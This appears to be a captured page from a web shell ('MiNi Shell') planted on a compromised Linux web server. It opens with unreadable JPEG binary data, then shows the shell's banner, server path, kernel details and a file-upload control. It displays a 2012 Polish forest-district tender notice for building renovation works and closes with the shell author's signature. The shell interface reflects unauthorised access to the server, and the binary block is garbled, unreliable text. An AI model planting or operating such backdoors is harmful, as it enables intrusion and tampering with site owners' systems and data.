JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120720/263368-N-2012.html

<p class="kh_header"><b>Lubaczów: Urządzenie ośrodka edukacji ekologicznej w Nadleśnictwie Lubaczów</b><br>
<b>Numer ogłoszenia: 263368 - 2012; data zamieszczenia: 20.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Lubaczów , ul. Słowackiego 20, 37-600 Lubaczów, woj. podkarpackie, tel. 016 6321972, 6321201, faks 016 6329004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Lasów Państwowych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Urządzenie ośrodka edukacji ekologicznej w Nadleśnictwie Lubaczów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót obejmuje: 
- rozebranie pokrycia dachowego z blachodachówki, 
- rozebranie rynien, rur spustowych i obróbek blacharskich, 
- prowizoryczne zabezpieczenie folią połaci dachowej, 
- rozebranie ołacenia połaci dachowej , 
- wymiana uszkodzonych i zniszczonych elementów więźby dachowej: 
krokwi, płatwi, słupów 
- uzupełnienie i wymiana uszkodzonej izolacji cieplnej z wełny mineralnej 
stropu poddasza, 
- izolacja paroprzepuszczalna więźby dachowej, 
- ołacenie więźby dachowej łatami i kontrłatami 
- wykonanie nowego pokrycia dachowego z blachodachówki wraz z rurami 
rynnami i obróbkami blacharskimi (kolor do uzgodnienia z Zamawiającym) , 
- wycięcie otworu na drzwi w ścianie pomiędzy salą edukacyjną a 
zapleczem i osadzenie drzwi, 
- wykucie otworu na drzwi z klatki schodowej do pokoju gościnnego z 
osadzeniem drzwi, 
- zlikwidowanie drzwi z korytarza do pokoju gościnnego, 
- rozebranie ścianek drewnianych w pomieszczeniach poddasza, 
- rozebranie podłogi z desek w pokoju gościnnym, który będzie 
przeznaczony na salę edukacyjną, 
      - wykonanie izolacji przeciwwilgociowej i przeciwdźwiękowej wraz z podkładem i ułożenie płytek gress w miejscu rozebranej podłogi, 
- w pomieszczeniu zaplecza Sali edukacyjnej wykonanie ścianek z płyt 
Specyfikacja istotnych warunków zamówienia 
Przebudowa dróg leśnych w Nadleśnictwie Lubaczów 
gipsowych, ocieplenie więźby dachowej, obicie ścian i sufitu płytami 
gipsowo - kartonowymi, 
- wykonanie podłogi z desek na legarach w pomieszczeniu zaplecza wraz z 
ociepleniem, 
- malowanie dwukrotne ścian i sufitów farbą emulsyjną wraz z 
szpachlowaniem pomieszczeń przeznaczonych na sale edukacyjne, 
- przesunięcie ścianki działowej w pomieszczeniu w.c. na parterze, 
- rozebranie posadzki z deszczułek w pomieszczeniu świetlicy, 
- wykonanie nowej posadzki z płytek gressowych antypoślizgowych na 
nowym podłożu w pomieszczeniu świetlicy, 
- skucie starych tynków na ścianach w pomieszczeniu świetlicy i wykonanie 
nowych tynków mozaikowych, 
- malowanie dwukrotne farbą emulsyjną ścian i sufitu pomieszczenia 
świetlicy. 
UWAGA! 
1. Wykonawca jest zobowiązany podczas wykonywania robót budowlanych do 
1.1 należytego zabezpieczenia pomieszczeń poddasza oraz stropów folią, przed wpływem niekorzystnych warunków atmosferycznych (silny wiatr, opady), 
1.2 należytego zabezpieczenia i oznakowania budynku w celu uniknięcia ewentualnego wypadku 
spowodowanego - min. spadającymi elementami, osób odwiedzających siedzibę Nadleśnictwa Lubaczów oraz pracowników Nadleśnictwa Lubaczów. 
2.	W razie uszkodzenia budynku przez opady atmosferyczne, Wykonawca ponosi pełny koszt usunięcia uszkodzeń. 
3.	Budynek będzie przez okres prowadzenia robót użytkowany jako budynek administracyjny Nadleśnictwa Lubaczów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiajacy przewiduje udzielenie robót uzupełniajacych do 50% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.43.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 
5000.00 PLN (słownie: pięć tysięcy 00/100 PLN) 
1. Wadium należy wnieść w terminie do dnia 2012.08.06 do godz. 10:00. 
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
a: pieniądzu: przelewem na rachunek bankowy Zamawiającego: PEKAO S.A. I oddz. w Lubaczowie 93124025841111000039445436; 
b: poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c: gwarancjach bankowych; 
d: gwarancjach ubezpieczeniowych; 
e: poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późno Zm.). 
3. 	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na 
wskazany w pkt. 2 rachunek bankowy najpóźniej przed upływem terminu składania 
ofert. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku 
bankowym. 
4. Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą. 
5. 	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty 
najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy pzp. 
6. 	Wykonawcy, którego oferta została wybrana jako naj korzystniej sza, Zamawiający 
zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego 
oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia 
żądano. 
7. 	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał 
ofertę przed upływem terminu składania ofert. 
8. 	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy pzp, jeżeli w wyniku 
rozstrzygnięcia odwołania jego oferta została wybrana jako naj korzystniejsza. 
Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami 
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za 
przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa wart. 26 ust. 3 ustawy pzp, nie złożył dokumentów lub 
oświadczeń, o których mowa w art. 25 ust. 1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
określonych w ofercie; 
b: nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
c: zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają 
warunki, dotyczące posiadania wiedzy l doświadczenia, polegające na 
wykonaniu w okresie ostatnich pięciu lat przed terminem składania ofert, a 
jeżeli okres prowadzenia działalności jest krótszy w tym okresie; 
na wykonaniu co najmniej 2 robót budowlanych o podobnym zakresie: 
o wartości brutto 100 000,00 PLN każda, 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na 
zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują 
odpowiednim potencjałem technicznym, w tym co najmniej: 
1 komplet rusztowania dla wysokości powyżej 7 m 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na 
zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują co 
najmniej jedną osobą z uprawnieniami do kierowania robotami budowlanymi 
w zakresie objętym przetargiem. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na 
zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają 
warunki, dotyczące sytuacji ekonomicznej i finansowej, poprzez: 
posiadanie ubezpieczenia od odpowiedzialności cywilnej na kwotę nie niższą 
niż; 200 000,00 PLN, 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na 
zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazane są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na 
podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem pkt. 2. 
2. Dopuszczalne są następujące zmiany treści umowy: 
2.1 zmiany zakresu zamówienia spowodowana zmianą dokumentacj i technicznej, 
skorygowanej przez projektanta i zaakceptowanej przez Zamawiającego, 
2.2 zmiana sposobu wykonania zamówienia, materiałów budowlanych, sprzętu, urządzeń, gdy 
wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w dokumentacji 
projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem 
procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie, 
2.3 zmiana terminu realizacji przedmiotu zamówienia, w przypadku: 
a)	działania siły wyższej, uniemożliwiającego wykonanie robót w określonym pierwotnie 
terminie, 
b) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających 
wykonywanie prac budowlanych lub spełnienie wymogów technologicznych, 
udokumentowanych w dzienniku budowy, 
c) błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność 
konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie, 
 
d) konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót, 
e) konieczności zmiany zakresu robót i finansowania, 
f) konieczności wykonania dodatkowych badań i ekspertyz, powodujących konieczność 
wstrzymania robót objętych niniejszą umową, 
g) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem 
niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia 
wzajemnych powiązań, w tym udzielenie w trakcie realizacji umowy zamówień 
dodatkowych i/lub uzupełniających, związanych z realizacją zamówienia 
podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji 
(powodujących konieczność jego wydłużenia), 
h) jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające 
się przypisać Zamawiającemu, personelowi Zamawiającego lub innemu wykonawcy 
zatrudnionemu przez Zamawiającego na terenie budowy, 
3	Zmiany umowy przewidziane w pkt. 38 dopuszczalne są na następujących warunkach: 
l)	- ad pkt. l) - zmniejszenie lub zwiększenie zakresu przedmiotu umowy w granicach 
uzasadnionego interesu Zamawiającego, 
2)	- ad pkt. 2) - zamiana na materiały, urządzenia i sprzęt posiadające co najmniej takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty oraz zmiana sposobu wykonania zamówienia powodująca usprawnienie procesu budowy, 
zwiększeniem bezpieczeństwa na budowie pod warunkiem nie zwiększania ceny; 
3) - ad pkt. 3) - w zakresie nie powodującym zwiększenia wynagrodzenia Wykonawcy 
określonego w niniejszej umowie, 
- lit. a) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania, 
- lit. b) - o czas trwania niesprzyjających warunków atmosferycznych, które uniemożliwią 
wykonanie zamówienia. 
-lit. c), d), e), f), g), h), - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót 
objętych przedmiotem umowy, lub o czas niezbędny do uzyskania wymaganych decyzji bądź 
uzgodnień lub do wykonania dodatkowych ekspertyz, badań. 
4Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie 
pisemnego aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lubaczow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadlesnictwo Lubaczów w Lubaczowie, ul. Słowackiego 20, 37-600 Lubaczów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2012 godzina 10:00, miejsce: Nadlesnictwo Lubaczów w Lubaczowie, ul. Słowackiego 20, 37-600 Lubaczów, pokój nr 1 (sekretariat). Otwarcie ofert pokój nr 9 (świetlica)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zadanie współfinansowane w ramach IV osi priorytetowej Ochrona środowiska i zapobieganie 
zagrożeniom , Działanie 4.3 Zachowanie oraz ochrona różnorodności biologicznej i krajobrazowej.

Wykonawca zobowiązany jest wnieść zabezpieczenie należytego wykonania umowy w wysokości: 5% wartosci Umowy brutto..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com